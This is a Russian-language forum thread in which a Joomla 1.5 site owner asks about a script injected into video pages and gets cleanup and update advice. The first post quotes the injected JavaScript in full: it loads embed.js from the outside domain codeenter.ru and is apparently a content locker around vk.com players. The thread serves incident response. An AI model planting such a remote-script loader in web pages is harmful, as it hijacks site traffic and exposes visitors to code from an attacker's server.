Что за скрипт? - Безопасность сайтов на Joomla

Добрый день друзья! С огромным уважением обращаюсь к вам за помощью и разъяснениями. Пишу на этом форуме впервые, поэтому не обессудьте, если что не так. У меня есть сайт (ему 5 месяцев), полностью предназначенный для просмотра видео в режиме онлайн, сделанный на движке Joomla 1.5.25 На нем 18 категорий. Вчера, зайдя в категорию "Скрытая камера" при открытии любой страницы с выбранным роликом антивирус начал ругаться. Сначала не вкурил что за фигня, но открыв HTML страницу в браузере увидел, что в каждой станице после тега <H1> стоит вот такая неприятность (короче говоря, побывала на сайте какая-то бяка без моего ведома):

<script type="text/javascript">
var ecConfig = ecConfig || [];
ecConfig['sid']='3739';
ecConfig['domain']='codeenter.ru';

ecConfig['locker']='vk.com/video_ext.php';
ecConfig['time']='30';
ecConfig['theme']='vk';

(function (){
var ecs = document.createElement('script'); ecs.type = 'text/javascript'; ecs.async = true;
ecs.src = ' + ecConfig['domain'] + '/embed.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ecs, s);
})();
</script>

Файл в корне сайта .htaccess смотрю тоже изменен и напичкан различными непонятными командами.  Хотел посмотреть что за такой сайт в скрипте указан (codeenter.ru), так тут же антивирус ESET раскричался. Удалил полностью весь сайт на серваке и закачал свою чистую новую последнюю резервную копию. Везде сменил пароли и дня 4 все было хорошо, потом опять в этой же категории во всех статьях появилась эта бяка. Страницы с другими роликами и категориями остались не тронуты. В этом куске скрипта вижу, что речь затрагивается о vk.com, наверно потому, что все ролики в Скрытой камере просматриваются через плееры vk.com. В остальных категориях плееров от vk.com очень мало. Уважаемые ребята, будьте добры объяснить, что выполняет этот скрипт? И что это за время в 30? Как избавиться от него. И где происходит вызов на действия этого скрипта.
Подозрение, что какой-то парсер что-ли или кто-то попытается таким образом трансляцию видео производить через сайт. И кажется что это бяка повязана с редактором на сайте. На сайте стоит TinyMCE. Вполне меня устраивает, другого нету. С чего начать чтобы избавиться от этой беды? По трафику сильно бьет. Сайт свой не указываю в этом посте, только потому, что не хочу, чтобы многие посчитали, что я рекламирую свой ресурс. Хотя в данной проблеме, его указывать и не обязательно. Уважаемые друзья, спасибо Вам огромное за внимание. очень жду ваших ответов и мыслей по данному скрипту. Желаю всем удачи и крепкого здоровья всем вашим близким и родным!

Для начала стоит попытаться обновить свою Joomla!, есть вероятность, что злоумышленники эксплуатируют уязвимость этой версии. Поэтому смена паролей не приносит результата.

Хотя я бы на вашем месте первым делом сделал так:

1)Проверил на вирусы ПК с которого идет обращение к ftp, админки сайта и т.д
2)Поменял все пароли к сайту
3)Обновил движок сайта

Затем нужно уже смотреть логи хостера и разбираться что конкретно и когда происходило с вашем сайтом.

Joomla 1.5.25 - дырявая, как швейцарский сыр. Уж если и оставаться на 1.5.х, то стоит хотя бы обновиться на 1.5.26.

По хорошему, стоит подумать об миграции на семью версий 2.5.х (последняя выпущенная версия на момент написания этого сообщения - 2.5.11).

Кстати, варезными расширениями баловались на своем сайте?

Для начала стоит попытаться обновить свою Joomla!, есть вероятность, что злоумышленники эксплуатируют уязвимость этой версии. Поэтому смена паролей не приносит результата.

Хотя я бы на вашем месте первым делом сделал так:

1)Проверил на вирусы ПК с которого идет обращение к ftp, админки сайта и т.д
2)Поменял все пароли к сайту
3)Обновил движок сайта

Затем нужно уже смотреть логи хостера и разбираться что конкретно и когда происходило с вашем сайтом.

oshpz спасибо что ответил. Пока ждал ответа произвел уже вот эти действия:

 - проверил свой комп на наличие вирусов антивирусом ESET - нашел 6 шт и удалил. Обновил движок до последней 1.5.26. Везде сменил пароли в админке, хостинге и у базы данных. Дописал несколько интересных вещей в файл .htaccess. Пока все спокойно. Сейчас начну просматривать логи.

AlexSmirnov спасибо что откликнулись. Joomla стоит у меня голая, дополнительными расширениями совсем не пользуюсь, некоторые даже удалил. Для моего сайта, тематику которую он несет, не нужны дополнительные расширения. У меня нет ни поиска по сайту ни регистрации, мне просто они не нужны. У меня люди приходят, смотрят видео, которое их интересует и потом уходят, многие возвращаются. Есть еще у меня сайты, один из них на движке 2.5, но эта Joomla совсем мне не нравится.

Просто очень интересно, что это за скрипт был. Что он в себе несет и какую цель, я так и не понял. А так хочется понять. Погуглил, но ничего похожего не нашел. Что интересно, пользователь попадает на сайт на главную страницу или категорию, все тихо и спокойно, но как только в категории находит видео и кликает на него для перехода на страницу просмотра, как тут же антивирус начинает кричать. И что еще интереснее, этот скрипт находился сразу после заголовка на всех страницах с видео только в одной категории а их 200 шт. В других категориях можно спокойно было смотреть ролики, антивирус молчит, HTML чистый в них. Только в категории "Скрытая камера" этот скрипт стоял.

Кстати хочу сказать отдельно людям создавшим этот форум большое горячее спасибо от всей души и чистого сердца. Отличный, я как влез сюда, так вылезти примерно часов 5 не мог, столько классной качественной информации - здорово. Читал все для себя интересное аж глаза на лоб лезли. Столько полезной информации я ни где не видел еще! Теперь с вами буду тут.

И из-за этого скрипта трафик упал, а для меня это потеря денег. Правда сейчас пошел потихоньку опять подниматься.

Сам скрипт подгружающийся


Что думает по этому поводу VirusTotal можно посмотреть тут
https://www.virustotal.com/ru/url/b7375c06d9d5c155247fec0884d0cb5c5629443e3a84b8e92e9f117a542560ff/analysis/1373524638/

Сам скрипт подгружающийся

Спойлер

[свернуть]

Что думает по этому поводу VirusTotal можно посмотреть тут
https://www.virustotal.com/ru/url/b7375c06d9d5c155247fec0884d0cb5c5629443e3a84b8e92e9f117a542560ff/analysis/1373524638/

Привет oshpz! Ты просто умница! Молодчина одним словом! 5+++! Теперь мне дошло, для чего его мне внедрили на сайт, догадки оправдались. Сейчас уже все в порядке, трафик вернулся, пусть эти любители внедрять всякое дерьмо палец свой сосут теперь. Спасибо тебе огромное, что не остался в стороне от моей проблемы.